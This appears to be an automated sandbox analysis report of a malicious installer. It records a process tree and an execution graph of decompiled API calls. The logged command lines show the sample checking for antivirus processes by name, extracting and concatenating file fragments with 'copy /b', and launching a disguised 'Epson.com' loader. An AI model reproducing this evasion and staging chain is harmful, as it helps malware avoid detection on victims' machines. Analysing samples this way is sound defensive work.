                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                    Imagebase:0x3d0000
                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                    Start time:16:56:57
                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                    Imagebase:0x730000
                                                                                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                    Start time:16:56:57
                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                    Imagebase:0x3d0000
                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                    Start time:16:56:57
                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:cmd /c md 250478
                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                    Start time:16:56:57
                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:extrac32 /Y /E Katrina
                                                                                                                                                                                                                                    Imagebase:0xd30000
                                                                                                                                                                                                                                    File size:29'184 bytes
                                                                                                                                                                                                                                    MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                    Start time:16:56:58
                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:findstr /V "JIM" Accepting
                                                                                                                                                                                                                                    Imagebase:0x3d0000
                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                    Start time:16:56:58
                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:cmd /c copy /b ..\Marco + ..\Dodge + ..\Loops + ..\Conclude + ..\Hydraulic + ..\Concern m
                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                    Start time:16:56:58
                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\250478\Epson.com
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:Epson.com m
                                                                                                                                                                                                                                    Imagebase:0xf50000
                                                                                                                                                                                                                                    File size:947'288 bytes
                                                                                                                                                                                                                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                    Start time:16:56:58
                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:choice /d y /t 5
                                                                                                                                                                                                                                    Imagebase:0x5b0000
                                                                                                                                                                                                                                    File size:28'160 bytes
                                                                                                                                                                                                                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:17.7%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                      Signature Coverage:21%
                                                                                                                                                                                                                                      Total number of Nodes:1482
                                                                                                                                                                                                                                      Total number of Limit Nodes:26
                                                                                                                                                                                                                                      execution_graph 4196 402fc0 4197 401446 18 API calls 4196->4197 4198 402fc7 4197->4198 4199 401a13 4198->4199 4200 403017 4198->4200 4201 40300a 4198->4201 4203 406831 18 API calls 4200->4203 4202 401446 18 API calls 4201->4202 4202->4199 4203->4199 4204 4023c1 4205 40145c 18 API calls 4204->4205 4206 4023c8 4205->4206 4209 407296 4206->4209 4212 406efe CreateFileW 4209->4212 4213 406f30 4212->4213 4214 406f4a ReadFile 4212->4214 4215 4062cf 11 API calls 4213->4215 4216 4023d6 4214->4216 4219 406fb0 4214->4219 4215->4216 4217 406fc7 ReadFile lstrcpynA lstrcmpA 4217->4219 4220 40700e SetFilePointer ReadFile 4217->4220 4218 40720f CloseHandle 4218->4216 4219->4216 4219->4217 4219->4218 4221 407009 4219->4221 4220->4218 4222 4070d4 ReadFile 4220->4222 4221->4218 4223 407164 4222->4223 4223->4221 4223->4222 4224 40718b SetFilePointer GlobalAlloc ReadFile 4223->4224 4225 4071eb lstrcpynW GlobalFree 4224->4225 4226 4071cf 4224->4226 4225->4218 4226->4225 4226->4226 4227 401cc3 4228 40145c 18 API calls 4227->4228 4229 401cca lstrlenW 4228->4229 4230 4030dc 4229->4230 4231 4030e3 4230->4231 4233 405f7d wsprintfW 4230->4233 4233->4231 4234 401c46 4235 40145c 18 API calls 4234->4235 4236 401c4c 4235->4236 4237 4062cf 11 API calls 4236->4237 4238 401c59 4237->4238 4239 406cc7 81 API calls 4238->4239 4240 401c64 4239->4240 4241 403049 4242 401446 18 API calls 4241->4242 4243 403050 4242->4243 4244 406831 18 API calls 4243->4244 4245 401a13 4243->4245 4244->4245 4246 40204a 4247 401446 18 API calls 4246->4247 4248 402051 IsWindow 4247->4248 4249 4018d3 4248->4249 4250 40324c 4251 403277 4250->4251 4252 40325e SetTimer 4250->4252 4253 4032cc 4251->4253 4254 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4251->4254 4252->4251 4254->4253 4255 4022cc 4256 40145c 18 API calls 4255->4256 4257 4022d3 4256->4257 4258 406301 2 API calls 4257->4258 4259 4022d9 4258->4259 4261 4022e8 4259->4261 4264 405f7d wsprintfW 4259->4264 4262 4030e3 4261->4262 4265 405f7d wsprintfW 4261->4265 4264->4261 4265->4262 4266 4030cf 4267 40145c 18 API calls 4266->4267 4268 4030d6 4267->4268 4270 4030dc 4268->4270 4273 4063d8 GlobalAlloc lstrlenW 4268->4273 4271 4030e3 4270->4271 4300 405f7d wsprintfW 4270->4300 4274 406460 4273->4274 4275 40640e 4273->4275 4274->4270 4276 40643b GetVersionExW 4275->4276 4301 406057 CharUpperW 4275->4301 4276->4274 4277 40646a 4276->4277 4278 406490 LoadLibraryA 4277->4278 4279 406479 4277->4279 4278->4274 4282 4064ae GetProcAddress GetProcAddress GetProcAddress 4278->4282 4279->4274 4281 4065b1 GlobalFree 4279->4281 4283 4065c7 LoadLibraryA 4281->4283 4284 406709 FreeLibrary 4281->4284 4285 406621 4282->4285 4289 4064d6 4282->4289 4283->4274 4287 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4274 4286 40667d FreeLibrary 4285->4286 4288 406656 4285->4288 4286->4288 4287->4285 4292 406716 4288->4292 4297 4066b1 lstrcmpW 4288->4297 4298 4066e2 CloseHandle 4288->4298 4299 406700 CloseHandle 4288->4299 4289->4285 4290 406516 4289->4290 4291 4064fa FreeLibrary GlobalFree 4289->4291 4290->4281 4293 406528 lstrcpyW OpenProcess 4290->4293 4295 40657b CloseHandle CharUpperW lstrcmpW 4290->4295 4291->4274 4294 40671b CloseHandle FreeLibrary 4292->4294 4293->4290 4293->4295 4296 406730 CloseHandle 4294->4296 4295->4285 4295->4290 4296->4294 4297->4288 4297->4296 4298->4288 4299->4284 4300->4271 4301->4275 4302 4044d1 4303 40450b 4302->4303 4304 40453e 4302->4304 4370 405cb0 GetDlgItemTextW 4303->4370 4305 40454b GetDlgItem GetAsyncKeyState 4304->4305 4309 4045dd 4304->4309 4307 40456a GetDlgItem 4305->4307 4320 404588 4305->4320 4312 403d6b 19 API calls 4307->4312 4308 4046c9 4368 40485f 4308->4368 4372 405cb0 GetDlgItemTextW 4308->4372 4309->4308 4317 406831 18 API calls 4309->4317 4309->4368 4310 404516 4311 406064 5 API calls 4310->4311 4313 40451c 4311->4313 4315 40457d ShowWindow 4312->4315 4316 403ea0 5 API calls 4313->4316 4315->4320 4321 404521 GetDlgItem 4316->4321 4322 40465b SHBrowseForFolderW 4317->4322 4318 4046f5 4323 4067aa 18 API calls 4318->4323 4319 403df6 8 API calls 4324 404873 4319->4324 4325 4045a5 SetWindowTextW 4320->4325 4329 405d85 4 API calls 4320->4329 4326 40452f IsDlgButtonChecked 4321->4326 4321->4368 4322->4308 4328 404673 CoTaskMemFree 4322->4328 4333 4046fb 4323->4333 4327 403d6b 19 API calls 4325->4327 4326->4304 4331 4045c3 4327->4331 4332 40674e 3 API calls 4328->4332 4330 40459b 4329->4330 4330->4325 4337 40674e 3 API calls 4330->4337 4334 403d6b 19 API calls 4331->4334 4335 404680 4332->4335 4373 406035 lstrcpynW 4333->4373 4338 4045ce 4334->4338 4339 4046b7 SetDlgItemTextW 4335->4339 4344 406831 18 API calls 4335->4344 4337->4325 4371 403dc4 SendMessageW 4338->4371 4339->4308 4340 404712 4342 406328 3 API calls 4340->4342 4351 40471a 4342->4351 4343 4045d6 4345 406328 3 API calls 4343->4345 4346 40469f lstrcmpiW 4344->4346 4345->4309 4346->4339 4349 4046b0 lstrcatW 4346->4349 4347 40475c 4374 406035 lstrcpynW 4347->4374 4349->4339 4350 404765 4352 405d85 4 API calls 4350->4352 4351->4347 4355 40677d 2 API calls 4351->4355 4357 4047b1 4351->4357 4353 40476b GetDiskFreeSpaceW 4352->4353 4356 40478f MulDiv 4353->4356 4353->4357 4355->4351 4356->4357 4358 40480e 4357->4358 4375 4043d9 4357->4375 4359 404831 4358->4359 4361 40141d 80 API calls 4358->4361 4383 403db1 KiUserCallbackDispatcher 4359->4383 4361->4359 4362 4047ff 4364 404810 SetDlgItemTextW 4362->4364 4365 404804 4362->4365 4364->4358 4367 4043d9 21 API calls 4365->4367 4366 40484d 4366->4368 4384 403d8d 4366->4384 4367->4358 4368->4319 4370->4310 4371->4343 4372->4318 4373->4340 4374->4350 4376 4043f9 4375->4376 4377 406831 18 API calls 4376->4377 4378 404439 4377->4378 4379 406831 18 API calls 4378->4379 4380 404444 4379->4380 4381 406831 18 API calls 4380->4381 4382 404454 lstrlenW wsprintfW SetDlgItemTextW 4381->4382 4382->4362 4383->4366 4385 403da0 SendMessageW 4384->4385 4386 403d9b 4384->4386 4385->4368 4386->4385 4387 401dd3 4388 401446 18 API calls 4387->4388 4389 401dda 4388->4389 4390 401446 18 API calls 4389->4390 4391 4018d3 4390->4391 4392 402e55 4393 40145c 18 API calls 4392->4393 4394 402e63 4393->4394 4395 402e79 4394->4395 4396 40145c 18 API calls 4394->4396 4397 405e5c 2 API calls 4395->4397 4396->4395 4398 402e7f 4397->4398 4422 405e7c GetFileAttributesW CreateFileW 4398->4422 4400 402e8c 4401 402f35 4400->4401 4402 402e98 GlobalAlloc 4400->4402 4405 4062cf 11 API calls 4401->4405 4403 402eb1 4402->4403 4404 402f2c CloseHandle 4402->4404 4423 403368 SetFilePointer 4403->4423 4404->4401 4407 402f45 4405->4407 4409 402f50 DeleteFileW 4407->4409 4410 402f63 4407->4410 4408 402eb7 4411 403336 ReadFile 4408->4411 4409->4410 4424 401435 4410->4424 4413 402ec0 GlobalAlloc 4411->4413 4414 402ed0 4413->4414 4415 402f04 WriteFile GlobalFree 4413->4415 4417 40337f 33 API calls 4414->4417 4416 40337f 33 API calls 4415->4416 4418 402f29 4416->4418 4421 402edd 4417->4421 4418->4404 4420 402efb GlobalFree 4420->4415 4421->4420 4422->4400 4423->4408 4425 404f9e 25 API calls 4424->4425 4426 401443 4425->4426 4427 401cd5 4428 401446 18 API calls 4427->4428 4429 401cdd 4428->4429 4430 401446 18 API calls 4429->4430 4431 401ce8 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401cf1 4432->4433 4434 401d07 lstrlenW 4433->4434 4435 401d43 4433->4435 4436 401d11 4434->4436 4436->4435 4440 406035 lstrcpynW 4436->4440 4438 401d2c 4438->4435 4439 401d39 lstrlenW 4438->4439 4439->4435 4440->4438 4441 402cd7 4442 401446 18 API calls 4441->4442 4444 402c64 4442->4444 4443 402d17 ReadFile 4443->4444 4444->4441 4444->4443 4445 402d99 4444->4445 4446 402dd8 4447 4030e3 4446->4447 4448 402ddf 4446->4448 4449 402de5 FindClose 4448->4449 4449->4447 4450 401d5c 4451 40145c 18 API calls 4450->4451 4452 401d63 4451->4452 4453 40145c 18 API calls 4452->4453 4454 401d6c 4453->4454 4455 401d73 lstrcmpiW 4454->4455 4456 401d86 lstrcmpW 4454->4456 4457 401d79 4455->4457 4456->4457 4458 401c99 4456->4458 4457->4456 4457->4458 4459 4027e3 4460 4027e9 4459->4460 4461 4027f2 4460->4461 4462 402836 4460->4462 4475 401553 4461->4475 4463 40145c 18 API calls 4462->4463 4465 40283d 4463->4465 4467 4062cf 11 API calls 4465->4467 4466 4027f9 4468 40145c 18 API calls 4466->4468 4472 401a13 4466->4472 4469 40284d 4467->4469 4470 40280a RegDeleteValueW 4468->4470 4479 40149d RegOpenKeyExW 4469->4479 4471 4062cf 11 API calls 4470->4471 4474 40282a RegCloseKey 4471->4474 4474->4472 4476 401563 4475->4476 4477 40145c 18 API calls 4476->4477 4478 401589 RegOpenKeyExW 4477->4478 4478->4466 4482 4014c9 4479->4482 4487 401515 4479->4487 4480 4014ef RegEnumKeyW 4481 401501 RegCloseKey 4480->4481 4480->4482 4484 406328 3 API calls 4481->4484 4482->4480 4482->4481 4483 401526 RegCloseKey 4482->4483 4485 40149d 3 API calls 4482->4485 4483->4487 4486 401511 4484->4486 4485->4482 4486->4487 4488 401541 RegDeleteKeyW 4486->4488 4487->4472 4488->4487 4489 4040e4 4490 4040ff 4489->4490 4496 40422d 4489->4496 4492 40413a 4490->4492 4520 403ff6 WideCharToMultiByte 4490->4520 4491 404298 4493 40436a 4491->4493 4494 4042a2 GetDlgItem 4491->4494 4500 403d6b 19 API calls 4492->4500 4501 403df6 8 API calls 4493->4501 4497 40432b 4494->4497 4498 4042bc 4494->4498 4496->4491 4496->4493 4499 404267 GetDlgItem SendMessageW 4496->4499 4497->4493 4502 40433d 4497->4502 4498->4497 4506 4042e2 6 API calls 4498->4506 4525 403db1 KiUserCallbackDispatcher 4499->4525 4504 40417a 4500->4504 4505 404365 4501->4505 4507 404353 4502->4507 4508 404343 SendMessageW 4502->4508 4510 403d6b 19 API calls 4504->4510 4506->4497 4507->4505 4511 404359 SendMessageW 4507->4511 4508->4507 4509 404293 4512 403d8d SendMessageW 4509->4512 4513 404187 CheckDlgButton 4510->4513 4511->4505 4512->4491 4523 403db1 KiUserCallbackDispatcher 4513->4523 4515 4041a5 GetDlgItem 4524 403dc4 SendMessageW 4515->4524 4517 4041bb SendMessageW 4518 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4517->4518 4519 4041d8 GetSysColor 4517->4519 4518->4505 4519->4518 4521 404033 4520->4521 4522 404015 GlobalAlloc WideCharToMultiByte 4520->4522 4521->4492 4522->4521 4523->4515 4524->4517 4525->4509 4526 402ae4 4527 402aeb 4526->4527 4528 4030e3 4526->4528 4529 402af2 CloseHandle 4527->4529 4529->4528 4530 402065 4531 401446 18 API calls 4530->4531 4532 40206d 4531->4532 4533 401446 18 API calls 4532->4533 4534 402076 GetDlgItem 4533->4534 4535 4030dc 4534->4535 4536 4030e3 4535->4536 4538 405f7d wsprintfW 4535->4538 4538->4536 4539 402665 4540 40145c 18 API calls 4539->4540 4541 40266b 4540->4541 4542 40145c 18 API calls 4541->4542 4543 402674 4542->4543 4544 40145c 18 API calls 4543->4544 4545 40267d 4544->4545 4546 4062cf 11 API calls 4545->4546 4547 40268c 4546->4547 4548 406301 2 API calls 4547->4548 4549 402695 4548->4549 4550 4026a6 lstrlenW lstrlenW 4549->4550 4552 404f9e 25 API calls 4549->4552 4554 4030e3 4549->4554 4551 404f9e 25 API calls 4550->4551 4553 4026e8 SHFileOperationW 4551->4553 4552->4549 4553->4549 4553->4554 4555 401c69 4556 40145c 18 API calls 4555->4556 4557 401c70 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 401c80 4558->4559 4560 405ccc MessageBoxIndirectW 4559->4560 4561 401a13 4560->4561 4562 402f6e 4563 402f72 4562->4563 4564 402fae 4562->4564 4566 4062cf 11 API calls 4563->4566 4565 40145c 18 API calls 4564->4565 4572 402f9d 4565->4572 4567 402f7d 4566->4567 4568 4062cf 11 API calls 4567->4568 4569 402f90 4568->4569 4570 402fa2 4569->4570 4571 402f98 4569->4571 4574 406113 9 API calls 4570->4574 4573 403ea0 5 API calls 4571->4573 4573->4572 4574->4572 4575 4023f0 4576 402403 4575->4576 4577 4024da 4575->4577 4578 40145c 18 API calls 4576->4578 4579 404f9e 25 API calls 4577->4579 4580 40240a 4578->4580 4583 4024f1 4579->4583 4581 40145c 18 API calls 4580->4581 4582 402413 4581->4582 4584 402429 LoadLibraryExW 4582->4584 4585 40241b GetModuleHandleW 4582->4585 4586 4024ce 4584->4586 4587 40243e 4584->4587 4585->4584 4585->4587 4589 404f9e 25 API calls 4586->4589 4599 406391 GlobalAlloc WideCharToMultiByte 4587->4599 4589->4577 4590 402449 4591 40248c 4590->4591 4592 40244f 4590->4592 4593 404f9e 25 API calls 4591->4593 4594 401435 25 API calls 4592->4594 4597 40245f 4592->4597 4595 402496 4593->4595 4594->4597 4596 4062cf 11 API calls 4595->4596 4596->4597 4597->4583 4598 4024c0 FreeLibrary 4597->4598 4598->4583 4600 4063c9 GlobalFree 4599->4600 4601 4063bc GetProcAddress 4599->4601 4600->4590 4601->4600 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4602 4048f8 4603 404906 4602->4603 4604 40491d 4602->4604 4605 40490c 4603->4605 4620 404986 4603->4620 4606 40492b IsWindowVisible 4604->4606 4612 404942 4604->4612 4607 403ddb SendMessageW 4605->4607 4609 404938 4606->4609 4606->4620 4610 404916 4607->4610 4608 40498c CallWindowProcW 4608->4610 4621 40487a SendMessageW 4609->4621 4612->4608 4626 406035 lstrcpynW 4612->4626 4614 404971 4627 405f7d wsprintfW 4614->4627 4616 404978 4617 40141d 80 API calls 4616->4617 4618 40497f 4617->4618 4628 406035 lstrcpynW 4618->4628 4620->4608 4622 4048d7 SendMessageW 4621->4622 4623 40489d GetMessagePos ScreenToClient SendMessageW 4621->4623 4625 4048cf 4622->4625 4624 4048d4 4623->4624 4623->4625 4624->4622 4625->4612 4626->4614 4627->4616 4628->4620 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4629 4020f9 GetDC GetDeviceCaps 4630 401446 18 API calls 4629->4630 4631 402116 MulDiv 4630->4631 4632 401446 18 API calls 4631->4632 4633 40212c 4632->4633 4634 406831 18 API calls 4633->4634 4635 402165 CreateFontIndirectW 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f7d wsprintfW 4636->4639 4639->4637 4640 4024fb 4641 40145c 18 API calls 4640->4641 4642 402502 4641->4642 4643 40145c 18 API calls 4642->4643 4644 40250c 4643->4644 4645 40145c 18 API calls 4644->4645 4646 402515 4645->4646 4647 40145c 18 API calls 4646->4647 4648 40251f 4647->4648 4649 40145c 18 API calls 4648->4649 4650 402529 4649->4650 4651 40253d 4650->4651 4652 40145c 18 API calls 4650->4652 4653 4062cf 11 API calls 4651->4653 4652->4651 4654 40256a CoCreateInstance 4653->4654 4655 40258c 4654->4655 4656 4026fc 4658 402708 4656->4658 4659 401ee4 4656->4659 4657 406831 18 API calls 4657->4659 4659->4656 4659->4657 4660 4019fd 4661 40145c 18 API calls 4660->4661 4662 401a04 4661->4662 4663 405eab 2 API calls 4662->4663 4664 401a0b 4663->4664 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 